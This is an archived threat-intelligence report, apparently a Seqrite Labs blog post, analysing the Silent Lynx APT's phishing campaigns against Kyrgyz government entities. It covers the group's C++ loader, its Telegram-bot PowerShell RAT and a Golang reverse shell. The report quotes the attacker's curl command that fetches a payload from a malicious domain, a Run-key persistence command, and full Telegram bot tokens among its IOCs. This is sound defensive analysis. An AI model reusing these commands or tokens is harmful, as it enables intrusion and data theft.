{
	"id": "9f1adcd1-75fa-4878-bde5-09a1f60ece9d",
	"created_at": "2026-04-06T00:11:04.988376Z",
	"updated_at": "2026-04-10T13:11:36.390306Z",
	"deleted_at": null,
	"sha1_hash": "225d3d7ed6d7f8800671e95afeaa1f2d82994af9",
	"title": "Unveiling Silent Lynx APT Targeting Entities Across Kyrgyzstan \u0026 Neighbouring Nations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1894600,
	"plain_text": "Unveiling Silent Lynx APT Targeting Entities Across Kyrgyzstan \u0026\r\nNeighbouring Nations\r\nBy Subhajeet Singha\r\nPublished: 2025-01-21 · Archived: 2026-04-05 16:02:01 UTC\r\nSilent Lynx APT Targets Various Entities Across Kyrgyzstan \u0026 Neighbouring Nations\r\nContents\r\nKey Targets\r\nIndustries Affected\r\nGeographical Focus\r\nInfection Chain\r\nInitial Findings\r\nCampaign 1\r\nLooking into the malicious email\r\nLooking into decoy document.\r\nCampaign 2\r\nLooking into the malicious email\r\nLooking into the decoy document\r\nTechnical Analysis\r\nCampaign 1\r\nStage 1 – Malicious ISO File\r\nStage 2 – Malicious C++ Loader\r\nStage 3 – Malicious PowerShell Script\r\nCampaign 2\r\nStage 1 – Malicious Golang Reverse-Shell\r\nInfrastructure \u0026 Hunting\r\nAttribution\r\nConclusion\r\nSeqrite Protection\r\nIOCs\r\nMITRE ATT\u0026CK\r\nIntroduction\r\nSeqrite Labs APT-Team has recently uncovered two fresh campaigns of a new threat group, which we have dubbed as Silent\r\nLynx. This threat group has previously targeted entities around Eastern Europe and Central Asian government think tanks\r\ninvolved in economic decision making \u0026 banking sector. The campaign is targeted towards one of the nations which is a\r\npart of SPECA (Special Programme for the Economies of Central Asia) aka Kyrgyzstan, where the threat group delivered\r\nUN-Themed lure targeting the government entities of National Bank of Kyrgyz Republic, while the second campaign targets\r\nMinistry of Finance of Kyrgyzstan.\r\nIn this blog, we’ll explore the in-depth technical details of the campaigns we encountered during our analysis. We will\r\nexamine the various stages of this campaign, where infection starts with a phishing email with an RAR attachment, which\r\ncontains a malicious ISO File and a benign decoy document along with a malicious C++ payload. The payload contains\r\nembedded \u0026 encoded PowerShell script acting as a remote access tool to the victim machine. While in the second campaign,\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 1 of 19\n\nthe phishing email has a password-protected RAR file attached, which contains a document decoy document and a malicious\r\nGolang Implant. We will also look at the infrastructure covering the entire campaign.\r\nKey Targets\r\nIndustries Affected\r\nEmbassies\r\nLawyers\r\nGovernment Banks\r\nGovernment Think-Tanks\r\nGeographical Focus\r\nKyrgyzstan\r\nTurkmenistan\r\nInfection Chain\r\nInitial Findings\r\nCampaign 1\r\nOn December 27, 2024, our team discovered a malicious Outlook message file targeting an official of the National Bank of\r\nthe Kyrgyz Republic. The message contains an RAR-compressed attachment named 20241228_140656.rar. Upon\r\nexamining the RAR file, we found a malicious ISO file named 20241228_140656.iso. The ISO file includes a malicious\r\nexecutable named Xerox_Scan17510875802718752175.exe, which spawns a PowerShell process. The arguments for the\r\nmalicious PowerShell process are encoded in Base64 and embedded within the C++ executable. Additionally, the ISO file\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 2 of 19\n\ndrops a decoy document titled 2024-00178nv Note Verbale_SPECA WG_2024. The same file was found by other threat\r\nresearchers the very next day.\r\nLooking into the malicious email\r\nLooking into the malicious outlook email, it became quite evident to us that the threat actor used a compromised email\r\naccount of an employee of National Bank of Kyrgyz. They delivered the malicious RAR file using this account along with\r\nan intriguing message mentioning that the email was supposed to be sent to the ministry of Finance, but they received it.\r\nNow, let us look into the decoy PDF which was dropped by the malicious ISO file.\r\nLooking into decoy document\r\nUpon extracting the ISO file, we identified two files: a malicious C++ executable and a decoy file. The decoy file is an\r\ninvitation to the Nineteenth Session of the SPECA Working Group on Trade, held in Samarkand, Uzbekistan, on April 3,\r\n2024. The document mimics legitimate communication from the United Nations Economic and Social Commission for Asia\r\nand the Pacific (ESCAP), leveraging the theme of “Leveraging Digitalization for Sustainable Supply Chains” to appear\r\ncredible and relevant. This strategy reduces suspicion, as Kyrgyzstan is one of the SPECA member nations.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 3 of 19\n\nCampaign 2\r\nLooking into the malicious email\r\nLooking into the malicious outlook email in the second campaign, we can see that the threat actor is using the exact same\r\ncompromised email account just like the first campaign. This time they have delivered a password protected RAR along\r\nwith a message of urgency luring employees in the name of Employee Bonus targeting the Ministry of Finance of the\r\nKyrgyz Republic. Now, let us look into the decoy PDF which was dropped from the RAR file.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 4 of 19\n\nLooking into decoy document\r\nUpon extracting the malicious RAR file, we discovered two files: a malicious Golang executable named Приложение\r\n№14-214-14-12-5-15docx and a decoy MS Word document titled Приказ №950-2-ГП о премировании.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 5 of 19\n\nThe decoy document appears to be an official order issued by the Ministry of Finance of the Kyrgyz Republic, detailing\r\nemployee bonus allocations. It includes the names of various employees along with the date of the order, January 8, 2025,\r\nmaking the lure appear timely and relevant. To enhance its legitimacy and reduce suspicion, the document also includes the\r\nname of a government official at the end.\r\nTechnical Analysis\r\nAs our team found out two campaigns, we have divided the technical analysis into two parts, initially we will look into the\r\nfirst campaign and later the one which deploys a malicious Golang executable.\r\nCampaign -1\r\nStage 1 – Malicious ISO File\r\nThe RAR file contains a malicious ISO file named 20241228_140656.iso. Upon extracting the ISO file, we discovered a\r\ndecoy PDF and a malicious C++ binary, which serves as the loader. In the next step, we will analyze the C++ binary.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 6 of 19\n\nStage 2 – Malicious C++ Loader\r\nBefore directly jumping into the analysis, we can confirm that the sample is not packed and is a C++ binary.\r\nUpon analyzing, we figured out that there is a giant blob of base64 encoded content present inside the malicious C++\r\nexecutable and there is a PowerShell command which runs an encoded script with flags -ExecutionPolicy Bypass leading to\r\nunrestricted script execution.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 7 of 19\n\nFinally, we can see that using CreateProcess API, a PowerShell Process is created which executes the encoded blob. In the\r\nnext section, we will examine the contents of the PowerShell blob which is being executed by this loader.\r\nStage 3 – Malicious PowerShell Script\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 8 of 19\n\nNow, post decoding the base64 encoded script, we found that the threat actor is using Telegram Bot to perform command\r\nexecution and data exfiltration. The script contains two interesting functions known as Invoke-BotCmd \u0026 Invoke-BotDownload. Let us look inside the working of these functions.\r\n① The Invoke-BotCmd function basically executes system commands received from the threat actor and sends the output\r\nback of the command which was executed to the user through the Telegram Bot API. It takes a command as input, runs it\r\nusing Invoke-Expression, and captures the output or any errors. The results are formatted with a unique identifier and sent\r\nback to the user. If the output exceeds Telegram’s 4095-character limit, it is divided into chunks and sent in multiple\r\nmessages. For shorter outputs, the message is sent directly. Therefore, this function facilitates remote command execution\r\nand response delivery, enabling interaction with the victim machine via Telegram API.\r\n② The Invoke-BotDownload function basically facilitates the upload of a file from the victim’s system to a Telegram chat\r\ncontrolled by the threat actor, enabling data exfiltration. It reads the file from a specified path, as requested by the threat\r\nactor, prepares the necessary metadata and content headers, and sends the file as a multipart form-data POST request to the\r\nTelegram API. Therefore, this function is designed to exfiltrate data from victim machines to the threat actor’s Telegram\r\nchat.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 9 of 19\n\n③ The rest of the section of the script forms the core operational logic of the bot, running in a continuous loop to monitor\r\nand process new messages from the Threat Actor. It uses the getUpdates API endpoint to fetch messages and acts on them\r\nbased on their content. Commands like /sleep allow the bot’s sleep interval to be adjusted, /cmd lets it execute system\r\ncommands using the Invoke-BotCmd function, and /download triggers file uploads from the victim machine through the\r\nInvoke-BotDownload function.\r\nFor custom commands with a specific identifier, the bot validates the identifier before performing the requested action. The\r\nscript ensures that each message is processed only once by updating the last seen message ID and implements error handling\r\nto retry failed API calls, pausing for random intervals to avoid detection or abnormal network behavior leading to early\r\ndetection or further anomalies. This loop allows the bot to perform tasks such as running commands, exfiltrating data, and\r\nmaintaining consistent communication with the threat actor.\r\nNow, as we are done looking into the C++ and PowerShell loader in the next section, we will look into the infrastructure and\r\nother campaigns and some other activities performed by the Threat Actor.\r\nCampaign – 2\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 10 of 19\n\nStage 1 – Malicious Golang Reverse-Shell\r\nUpon extraction of the malicious RAR file, we could see that there are two files inside only, out of which one is the decoy\r\ndocument, and the other is basically the Golang executable file.\r\nUpon peeking inside the binary, we find the binary is a reverse shell written in Golang, using packages like net_dial to\r\nconnect to the command and control, in case it fails to connect to the C2, it sleeps for 0.5 seconds, runs various commands.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 11 of 19\n\nInfrastructure \u0026 Hunting\r\nIn the previous section, we saw that the threat actor is using Telegram Bot to perform actions on the victim system and other\r\ntasks like downloading. Fortunately, we have the Bot token hardcoded inside the PowerShell Script, where we found out\r\ninteresting stuff. This is the telegram bot, which has been used in this campaign, which has been forwarding the contents to\r\nthe threat actor.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 12 of 19\n\nWe can also see a few common commands executed by the threat actor in the target machine such as whoami, ipconfig and\r\nsuch to perform discovery on the target system.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 13 of 19\n\nAnother interesting case is we can see that the Threat Actor (TA) is downloading a malicious payload from a webserver and\r\nestablishing persistence on the compromised system. Using the command cmd /c curl -o c:\\users\\public\\gservice.exe\r\nhxxps://pweobmxdlboi.com/147.exe, the TA downloads a malicious executable from a remote server and saves it as\r\ngservice.exe in the c:\\users\\public directory.\r\nTo ensure persistence, the threat actor executes a registry modification command, REG ADD\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WinUpTask /t REG_SZ /d c:\\users\\public\\gservice.exe /f,\r\nwhich adds the executable to the Windows Run key, causing it to launch automatically whenever the user logs in. Attacker\r\nthen verifies the modification with the REG query command and confirms that the persistence mechanism was successfully\r\nestablished with the message “Операция успешно завершена” (“The operation was successfully completed”).\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 14 of 19\n\nOne of the compromised victims is believed to be closely linked to diplomatic operations between Turkmenistan and\r\nKyrgyzstan. The presence of sensitive files, such as “Turkmenistanyn Gyrgyz Respublikasyndaky Ilcihanasynyn\r\nmeyilnamasy.docx”, suggests the attackers targeted the victim to gather intelligence on diplomatic plans and relations,\r\nindicating espionage to be one of the primary goals of this campaign not only limited to Bank but other government entities\r\nas well.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 15 of 19\n\nWhile hunting for other campaigns ran by the same threat actor in fact the exact same operator (same Telegram User) we\r\nfound that the threat actor also has been using other Telegram based Bot to run campaigns against various victims across\r\nsame geographic location.\r\nIn addition, to this we found that the threat actor has been using a red-team open-source tool known as resocks, which the\r\nthreat actor had hosted into their infrastructure.\r\nThe domains, where the threat actor hosted their malicious implants are as follows.\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 16 of 19\n\nMalicious Domains\r\nhxxps:[//]pweobmxdlboi[.]com\r\nhxxps:[//]document[.]hometowncity[.]cloud\r\nhxxps:[//]mailboxdownload[.]com\r\nUpon hunting further, we found that the threat actor also uses Google Drive to download further payloads into the victim\r\nsystem and currently depends on C++, MSIL implants. These either have malicious PowerShell script embedded or being\r\ndownloaded from text sharing services such as Pastebin and has been dependent on Telegram for data exfiltration and\r\nCommand \u0026 Control services in the recent campaigns.\r\nAttribution\r\nAttribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various\r\ndomains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat\r\nactor, and sometimes operational mistakes.\r\nIn our ongoing tracking of Silent Lynx, we discovered notable similarities and overlaps with a Kazakhstan-based threat\r\nactor/group known as YoroTrooper, as identified by our colleagues at Cisco Talos. Let’s explore some of the key overlaps\r\nbetween Silent Lynx and YoroTrooper.\r\nKey Overlaps Between Silent Lynx and YoroTrooper\r\n1. Tooling Arsenal:\r\nResearchers at Cisco Talos observed that YoroTrooper frequently modifies and switches its toolset, creating a pseudo-anti-detection mechanism. Recent YoroTrooper operations have relied heavily on PowerShell-based tools. Similarly,\r\nSilent Lynx has demonstrated significant reliance on PowerShell tooling, with code overlaps observed between the\r\ntwo groups.\r\n2. Motivation:\r\nBoth Silent Lynx and YoroTrooper share similar motivations, primarily engaging in espionage targeting government\r\nentities in Kyrgyzstan and its neighboring nations.\r\nBeyond these examples, additional strong similarities reinforce the connection between these two threat groups. With a\r\nmedium level of confidence, we attribute Silent Lynx as a Kazakhstan-origin threat actor that likely shares resources with\r\nYoroTrooper, positioning it as a Kazakhstan-oriented threat.\r\nConclusion\r\nSilent Lynx’s campaigns demonstrate a sophisticated multi-stage attack strategy using ISO files, C++ loaders, PowerShell\r\nscripts, and Golang implants. Their reliance on Telegram bots for command and control, combined with decoy documents\r\nand regional targeting which also highlights their focus on espionage in Central Asia and SPECA based nations. Silent Lynx\r\nalso overlaps with YoroTrooper which shows resource sharing, reinforcing their attribution as a Kazakhstan-based threat\r\ngroup.\r\nSEQRITE Protection\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 17 of 19\n\nSLynx\r\nGeneric\r\nIOCs\r\nFile-Type Filename SHA-256\r\nEXE 147.exe efb700681713cd50a2addd1fea6b7ee80c084467d3e87668688b9f0664206\r\nEXE Xerox_Scan17510875802718752175.exe e6f76a73180b4f2947764f4de57b52d037b482ece1a88dab9d3290e76be8c0\r\nEXE 14789.exe 3560660162f2268d52b69382c78192667a7eee5796d77418a8609b2f1709f\r\nEXE resocks.exe 297d1afa309cdf0c84f04994ffd59ee1e1175377c1a0a561eb25869909812c\r\nISO 20241228_140656.iso c045344b23fc245f35a0ff4a6d6fa744d580cde45c8cd0849153dee7dce1d8\r\nEXE Приложение №14-214-14-12-5-15docx 1b76931775aa4de29df27a9de764b22f17ca117d6e5ae184f4ef617c970fc0\r\nEXE sokcs.exe 66294c9925ad454d5640f4fe753da9e7d6742f60b093ed97be88fcdd47b044\r\nEXE udadd.exe 99c6017c8658faf678f1b171c8eb5d5fa7e7d08e0a0901b984a8e3e1fab565\r\nDomains / URLs\r\nhxxps:[//]pweobmxdlboi[.]com\r\nhxxps:[//]document[.]hometowncity[.]cloud\r\nhxxps:[//]mailboxdownload[.]com\r\nhxxps[:]//api[.]telegram[.]org/bot8171872935:AAHLoudjpHz1bxA26bV5wPuOEL3LOHEl6Qk\r\nhxxps[:]//api[.]telegram[.]org/bot7898508392:AAF5FPbJ1jlPQfqCIGnx-zNdw2R5tF_Xxt0\r\nMITRE ATT\u0026CK\r\nTactic Technique ID Name\r\nReconnaissance T1589.002 Gather Victim Identity Information: Email Addresses\r\nInitial Access\r\nT1204.002\r\nT1078.002\r\nUser Execution: Malicious File\r\nValid Accounts: Domain Accounts\r\nExecution T1059.001 Command and Scripting Interpreter: PowerShell\r\nPersistence T1547.001 Registry Run Keys / Startup Folder\r\nCredential Access\r\nT1056.001\r\nT1552.001\r\nInput Capture: Keylogging\r\nUnsecured Credentials: Credentials In Files\r\nDiscovery T1087\r\nT1083\r\nT1046\r\nT1012\r\nAccount Discovery\r\nFile and Directory Discovery\r\nNetwork Service Discovery\r\nQuery Registry\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 18 of 19\n\nT1018\r\nT1016\r\nT1007\r\nRemote System Discovery\r\nSystem Network Configuration Discovery\r\nSystem Service Discovery\r\nCollection T1560.001 Archive Collected Data: Archive via Utility\r\nExfiltration T1567.002 Exfiltration to Cloud Storage\r\nAuthors\r\nSubhajeet Singha\r\nRhishav Kanjilal\r\nSource: https://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nhttps://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.seqrite.com/blog/silent-lynx-apt-targeting-central-asian-entities/"
	],
	"report_names": [
		"silent-lynx-apt-targeting-central-asian-entities"
	],
	"threat_actors": [
		{
			"id": "c416152c-d268-40a3-8887-01d2ec452b7c",
			"created_at": "2023-04-27T02:04:45.481771Z",
			"updated_at": "2026-04-10T02:00:04.987067Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Silent Lynx"
			],
			"source_name": "ETDA:YoroTrooper",
			"tools": [
				"Loda",
				"Loda RAT",
				"LodaRAT",
				"Meterpreter",
				"Nymeria",
				"Warzone",
				"Warzone RAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "322248d6-4baf-4ada-af8e-074bc6c10132",
			"created_at": "2023-11-05T02:00:08.072145Z",
			"updated_at": "2026-04-10T02:00:03.397406Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Comrade Saiga",
				"Salted Earth",
				"Sturgeon Fisher",
				"ShadowSilk",
				"Silent Lynx",
				"Cavalry Werewolf",
				"SturgeonPhisher"
			],
			"source_name": "MISPGALAXY:YoroTrooper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434264,
	"ts_updated_at": 1775826696,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/225d3d7ed6d7f8800671e95afeaa1f2d82994af9.pdf",
		"text": "https://archive.orkl.eu/225d3d7ed6d7f8800671e95afeaa1f2d82994af9.txt",
		"img": "https://archive.orkl.eu/225d3d7ed6d7f8800671e95afeaa1f2d82994af9.jpg"
	}
}